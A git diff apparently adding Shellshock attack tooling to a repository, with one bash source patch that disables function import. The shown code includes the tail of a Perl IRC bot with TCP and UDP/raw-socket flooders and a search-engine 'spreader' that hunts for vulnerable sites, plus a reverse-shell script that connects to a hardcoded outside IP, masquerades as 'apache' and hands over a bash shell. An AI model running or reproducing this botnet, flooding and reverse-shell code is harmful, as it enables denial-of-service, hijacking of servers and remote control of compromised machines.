+ $pa=sockaddr_in($_[1],$ia);
+ $ftime=$_[2];
+ $proto=getprotobyname('tcp');
+ $j=0;$l=0;
+ $cur_time = time - $itime;
+ while ($l<1000){
+  $cur_time = time - $itime;
+  last if $cur_time >= $ftime;
+  $t="SOCK$l";
+  socket($t,PF_INET,SOCK_STREAM,$proto);
+  connect($t,$pa)||$j--;
+  $j++;$l++;
+ }
+ $l=0;
+ while ($l<1000){
+  $cur_time = time - $itime;
+  last if $cur_time >= $ftime;
+  $t="SOCK$l";
+  shutdown($t,2);
+  $l++;
+ }
+}
+
+sub udpflooder {
+  my $iaddr = inet_aton($_[0]);
+  my $msg = 'A' x $_[1];
+  my $ftime = $_[2];
+  my $cp = 0;
+  my (%pacotes);
+  $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
+  
+  socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
+  socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
+  socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
+  socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
+  return(undef) if $cp == 4;
+  my $itime = time;
+  my ($cur_time);
+  while ( 1 ) {
+     for (my $porta = 1; $porta <= 65000; $porta++) {
+       $cur_time = time - $itime;
+       last if $cur_time >= $ftime;
+       send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
+       send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
+       send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
+       send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;
+
+       for (my $pc = 3; $pc <= 255;$pc++) {
+         next if $pc == 6;
+         $cur_time = time - $itime;
+         last if $cur_time >= $ftime;
+         socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
+         send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
+       }
+     }
+     last if $cur_time >= $ftime;
+  }
+  return($cur_time, %pacotes);
+}
+
+sub ctcp {
+   return unless $#_ == 1;
+   sendraw("PRIVMSG $_[0] :\001$_[1]\001");
+}
+sub msg {
+   return unless $#_ == 1;
+   sendraw("PRIVMSG $_[0] :$_[1]");
+}  
+sub notice {
+   return unless $#_ == 1;
+   sendraw("NOTICE $_[0] :$_[1]");
+}
+sub op {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] +o $_[1]");
+}
+sub deop {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] -o $_[1]");
+}
+sub j { &join(@_); }
+sub join {
+   return unless $#_ == 0;
+   sendraw("JOIN $_[0]");
+}
+sub p { part(@_); }
+sub part {
+  sendraw("PART $_[0]");
+}
+sub nick {
+  return unless $#_ == 0;
+  sendraw("NICK $_[0]");
+}
+sub quit {
+  sendraw("QUIT :$_[0]");
+}
+
+# Spreader
+# this 'spreader' code isnot mine, i dont know who coded it.
+# update: well, i just fix0red this shit a bit.
+#
+
+sub fetch(){
+    my $rnd=(int(rand(9999)));
+    my $n= 80;
+    if ($rnd<5000) { $n<<=1;}
+    my $s= (int(rand(10)) * $n);
+
+my @dominios = ("com","net","org","info","gov", "gob","gub","xxx", 
+"eu","mil","edu","aero","name","us","ca","mx","pa","ni","cu","pr","ve","co","pe","ec",
+                
+"py","cl","uy","ar","br","bo","au","nz","cz","kr","jp","th","tw","ph","cn","fi","de","es","pt","ch","se","su","it","gr","al","dk","pl","biz","int","pro","museum","coop",
+                
+"af","ad","ao","ai","aq","ag","an","sa","dz","ar","am","aw","at","az","bs","bh","bd","bb","be","bz","bj","bm","bt","by","ba","bw","bn","bg","bf","bi",
+                "vc","kh","cm","td","cs","cy","km","cg","cd","dj","dm","ci","cr","hr","kp","eg","sv","aw","er","sk",
+                
+"ee","et","ge","fi","fr","ga","gs","gh","gi","gb","uk","gd","gl","gp","gu","gt","gg","gn","gw","gq","gy","gf","ht","nl","hn","hk","hu","in","id","ir",
+                
+"iq","ie","is","ac","bv","cx","im","nf","ky","cc","ck","fo","hm","fk","mp","mh","pw","um","sb","sj","tc","vg","vi","wf","il","jm","je","jo","kz","ke",
+                
+"ki","kg","kw","lv","ls","lb","ly","lr","li","lt","lu","mo","mk","mg","my","mw","mv","ml","mt","mq","ma","mr","mu","yt","md","mc","mn","ms","mz","mm",
+                
+"na","nr","np","ni","ne","ng","nu","no","nc","om","pk","ps","pg","pn","pf","qa","sy","cf","la","re","rw","ro","ru","eh","kn","ws","as","sm","pm","vc",  
+        
+                
+"sh","lc","va","st","sn","sc","sl","sg","so","lk","za","sd","se","sr","sz","rj","tz","io","tf","tp","tg","to","tt","tn","tr","tm","tv","ug","ua","uz",
+                "vu","vn","ye","yu","cd","zm","zw","");
+my @str;
+
+foreach $dom  (@dominios)
+{
+        push (@str,"%22inurl%3Amodules.php%3Fname%3DSQuery%22+site%3A".$dom."%20");
+}
+
+    my $query="www.google.com/search?q=";
+    $query.=$str[(rand(scalar(@str)))];
+    $query.="&num=$n&start=$s";
+    my @lst=();
+    my $page = http_query($query);
+    while ($page =~  m/<a class=l href=\"?http:\/\/([^>\"]+)\"?>/g){
+        if ($1 !~ m/google|cache|translate/){
+            push (@lst,$1);
+        }
+    }
+    return (@lst);
+}
+
+sub http_query($){
+    my ($url) = @_;
+    my $host=$url;
+    my $query=$url;
+    my $page="";
+    $host =~ s/href=\"?http:\/\///;
+    $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
+    $query =~s/$host//;
+    if ($query eq "") {$query="/";};
+    eval {
+        local $SIG{ALRM} = sub { die "1";};
+        alarm 10;
+        my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
+        print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
+        my @r = <$sock>;
+        $page="@r";
+        alarm 0;
+        close($sock);
+    };    
+    return $page;
+
+}
\ No newline at end of file
diff --git a/OS_Injections/ShellShocker/scripts/paylod_2.pl b/OS_Injections/ShellShocker/scripts/paylod_2.pl
new file mode 100644
index 0000000..13a3666
--- /dev/null
+++ b/OS_Injections/ShellShocker/scripts/paylod_2.pl
@@ -0,0 +1,107 @@
+#!/usr/bin/perl -w
+
+use IO::Socket;
+use Fcntl;
+
+# IOCTLs
+$TIOCGPTN = -2147199952;
+$TIOCSPTLCK = 1074025521;
+$EAGAIN=11;
+
+print "pmsh.pl v0.1 (c) 2006 Michael Schierl <schierlm-public AT gmx DOT de>\n";
+
+$HOST="72.167.37.182";
+$PORT="23";
+
+$0="apache";
+
+print "Connecting to $HOST:$PORT... ";
+
+$sock = new IO::Socket::INET (
+	PeerAddr => $HOST,
+	PeerPort => $PORT,
+	Proto => 'tcp',
+	Blocking => 0,
+) or die $!;
+
+print "ok\nAllocatig pseudo terminal... ";
+
+## ptsname
+sysopen (PTMX, '/dev/ptmx', O_RDWR|O_NONBLOCK) or die $!;
+$tmp='';
+ioctl (PTMX, $TIOCGPTN, $tmp) or die $!;
+$pts = unpack('i', $tmp);
+
+print "/dev/pts/$pts\nInitializing pseudo terminal... ";
+
+## grantpt not needed on devpts
+
+## unlockpt
+$unlock=pack('i', 0);
+ioctl(PTMX, $TIOCSPTLCK, $unlock) or die $!;
+
+## prepare daemonizing
+chdir '/' or die $!;
+open STDIN, '/dev/null' or die $!;
+umask 0;
+
+print "ok\nForking shell thread...";
+
+defined($pid = fork) or die $!;
+exit if $pid;
+defined($pid = fork) or die $!;
+if (!$pid) {
+	exec("/sbin/getty -n -l /bin/bash 38400 /dev/pts/$pts") or
+	exec("/bin/bash </dev/pts/$pts >/dev/pts/$pts 2>/dev/pts/$pts") or
+	die $!;
+	exit;
+}        
+
+print "ok\nHave fun!\n";
+
+open STDOUT, '>>/dev/null' or die $!;
+open STDERR, '>>/dev/null' or die $!;
+
+$pp = PTMX;
+$rin=$win=$ein='';
+vec($rin,fileno($pp),1) =1;
+vec($rin,fileno($sock),1) = 1;
+
+select $sock;
+$|=1;
+select PTMX;
+$|=1;
+select STDOUT;
+$|=1;
+$finished=0;
+
+sub forwarddata {
+	my ($from,$to) = @_;
+	while(1) {
+		$rv = sysread($from, $buff, 1024);
+		last if (!defined($rv) && $! == $EAGAIN);	
+		defined($rv) or die $!;
+		if ($rv == 0) { $finished = 1; last;}
+		while(length $buff > 0) {
+			$rv = syswrite($to, $buff, length $buff);
+			if (!defined($rv) && $! == $EAGAIN) {
+				## try again
+				next;
+			}
+			defined($rv) or die $!;
+			last if ($rv == length $buff);
+			substr($buff,0,$rv) = '';
+		}
+	}
+}
+
+while(! $finished) {
+	$nfound = select($rout=$rin, $wout=$win, $eout=$ein, undef);
+	die $! if ($nfound == -1);
+	forwarddata($pp,$sock);
+	last if $finished;
+	forwarddata($sock,$pp);
+	last if $finished;
+}
+close PTMX;
+close $sock;
\ No newline at end of file
diff --git a/OS_Injections/ShellShocker/scripts/shellshock_nuke.sh b/OS_Injections/ShellShocker/scripts/shellshock_nuke.sh
new file mode 100644
index 0000000..ef7ad13
--- /dev/null
+++ b/OS_Injections/ShellShocker/scripts/shellshock_nuke.sh
@@ -0,0 +1,106 @@
+#shellshock fix. Nuke the whole feature from orbit, it's the only way to be sure. -@andreasdotorg
+
+diff --git a/variables.c b/variables.c
+index cdc54bc..1a98efa 100644
+--- a/variables.c
++++ b/variables.c
+@@ -347,85 +347,25 @@ initialize_shell_variables (env, privmode)
+ 
+       temp_var = (SHELL_VAR *)NULL;
+ 
+-      /* If exported function, define it now.  Don't import functions from
+-	 the environment in privileged mode. */
+-      if (privmode == 0 && read_but_dont_execute == 0 && STREQN ("() {", string, 4))
++      ro = 0;
++      if (posixly_correct && STREQ (name, "SHELLOPTS"))
+ 	{
+-	  string_length = strlen (string);
+-	  temp_string = (char *)xmalloc (3 + string_length + char_index);
+-
+-	  strcpy (temp_string, name);
+-	  temp_string[char_index] = ' ';
+-	  strcpy (temp_string + char_index + 1, string);
+-
+-	  if (posixly_correct == 0 || legal_identifier (name))
+-	    parse_and_execute (temp_string, name, SEVAL_NONINT|SEVAL_NOHIST);
+-
+-	  /* Ancient backwards compatibility.  Old versions of bash exported
+-	     functions like name()=() {...} */
+-	  if (name[char_index - 1] == ')' && name[char_index - 2] == '(')
+-	    name[char_index - 2] = '\0';
+-
+-	  if (temp_var = find_function (name))
+-	    {
+-	      VSETATTR (temp_var, (att_exported|att_imported));
+-	      array_needs_making = 1;
+-	    }
+-	  else
+-	    {
+-	      if (temp_var = bind_variable (name, string, 0))
+-		{
+-		  VSETATTR (temp_var, (att_exported | att_imported | att_invisible));
+-		  array_needs_making = 1;
+-		}
+-	      last_command_exit_value = 1;
+-	      report_error (_("error importing function definition for `%s'"), name);
+-	    }
+-
+-	  /* ( */
+-	  if (name[char_index - 1] == ')' && name[char_index - 2] == '\0')
+-	    name[char_index - 2] = '(';		/* ) */
++	  temp_var = find_variable ("SHELLOPTS");
++	  ro = temp_var && readonly_p (temp_var);
++	  if (temp_var)
++	    VUNSETATTR (temp_var, att_readonly);
+ 	}
+-#if defined (ARRAY_VARS)
+-#  if ARRAY_EXPORT
+-      /* Array variables may not yet be exported. */
+-      else if (*string == '(' && string[1] == '[' && string[strlen (string) - 1] == ')')
++      temp_var = bind_variable (name, string, 0);
++      if (temp_var)
+ 	{
+-	  string_length = 1;
+-	  temp_string = extract_array_assignment_list (string, &string_length);
+-	  temp_var = assign_array_from_string (name, temp_string);
+-	  FREE (temp_string);
+-	  VSETATTR (temp_var, (att_exported | att_imported));
++	  if (legal_identifier (name))
++	    VSETATTR (temp_var, (att_exported | att_imported));
++	  else
++	    VSETATTR (temp_var, (att_exported | att_imported | att_invisible));
++	  if (ro)
++	    VSETATTR (temp_var, att_readonly);
+ 	  array_needs_making = 1;
+ 	}
+-#  endif /* ARRAY_EXPORT */
+-#endif
+-#if 0
+-      else if (legal_identifier (name))
+-#else
+-      else
+-#endif
+-	{
+-	  ro = 0;
+-	  if (posixly_correct && STREQ (name, "SHELLOPTS"))
+-	    {
+-	      temp_var = find_variable ("SHELLOPTS");
+-	      ro = temp_var && readonly_p (temp_var);
+-	      if (temp_var)
+-		VUNSETATTR (temp_var, att_readonly);
+-	    }
+-	  temp_var = bind_variable (name, string, 0);
+-	  if (temp_var)
+-	    {
+-	      if (legal_identifier (name))
+-		VSETATTR (temp_var, (att_exported | att_imported));
+-	      else
+-		VSETATTR (temp_var, (att_exported | att_imported | att_invisible));
+-	      if (ro)
+-		VSETATTR (temp_var, att_readonly);
+-	      array_needs_making = 1;
+-	    }
+-	}
+ 
+       name[char_index] = '=';
+       /* temp_var can be NULL if it was an exported function with a syntax
\ No newline at end of file
diff --git a/OS_Injections/ShellShocker/shellshocker-pocs b/OS_Injections/ShellShocker/shellshocker-pocs
new file mode 160000
index 0000000..3a4706e
--- /dev/null
+++ b/OS_Injections/ShellShocker/shellshocker-pocs
@@ -0,0 +1 @@
+Subproject commit 3a4706e51449753b16a6b1d761276ec791129f4c